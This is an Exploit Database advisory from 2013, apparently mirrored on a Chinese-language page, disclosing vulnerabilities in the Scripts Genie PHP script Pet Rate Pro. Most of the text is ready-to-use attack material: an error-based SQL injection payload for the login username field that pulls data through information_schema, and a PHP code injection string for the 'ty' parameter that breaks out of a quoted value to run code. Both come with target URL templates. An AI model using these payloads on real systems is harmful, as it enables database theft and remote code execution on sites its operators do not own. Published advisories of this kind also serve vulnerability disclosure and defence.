Scripts Genie Pet Rate Pro – Multiple Vulnerabilities

• Exploit Database
• 95 阅读

• 作者： TheMirkin
  日期： 2013-02-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/24514/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41

  ######################################################################### # __.__.__# #|__|________ |__| ______ ___________ _______|__| ____ ______ # #|\__\/\||/___//___/\__\\___ \|/ __ \ /___/ # #||/ __ \| |\|\___ \ \___ \/ __ \|| \/\___/ \___ \# #/\__|(____/___|/__/____>____>(____/__||__|\___>____> # #\______|\/ \/\/ \/\/\/ \/# # www.janissaries.org # ##=====================================================================##   xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx «««:»»» Pet Rate Pro Multi Vulnerability «««:»»» xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ./Title Exploit : Pet Rate Pro Multi Vulnerability ./WebApps URL :http://scriptsgenie.com/index.php?do=catalog&c=scripts&i=pet_rate_pro ./Author Exploit: [ TheMirkin ] [ th3mirkin@gmail.com.com ] [ All Janissaries ] ./Security Risk : [ High Level ] ./Category XPL: [ WebApps] ./Time & Date : 18.02.2013. 09:50 PM. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ################################################################################# # # #=> Exploit: SQL injection # http://[target]/[path]//demo/PetRatePro/index.php?cmd=4 # Demo: # URL encoded POST input username was set to # 'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(121),CHAR(82),CHAR(65),CHAR(101),CHAR(74),CHAR(100),CHAR(109),CHAR(55)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and' # ##=> Exploit: Code Ýnjection # # http://[target]/[path]/index.php?cmd=10&ty="%3bprint(TheMirkin_janissaries_Pentester)%3b%24a%3d" # Demo: # http://server/index.php?cmd=10&ty=%22%3bprint%28TheMirkin_janissaries_Pentester%29%3b%24a%3d%22 # # xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx[ Thanks For All ]xxxxxxxxxxxxxxxxxxxxxxxxxxxxx # # Special Thanks : Burtay and All Janissaries Team(Burtay,B127Y,Miyachung,3spi0n,TheMirkin,Michelony,Mectruy) #################################################################################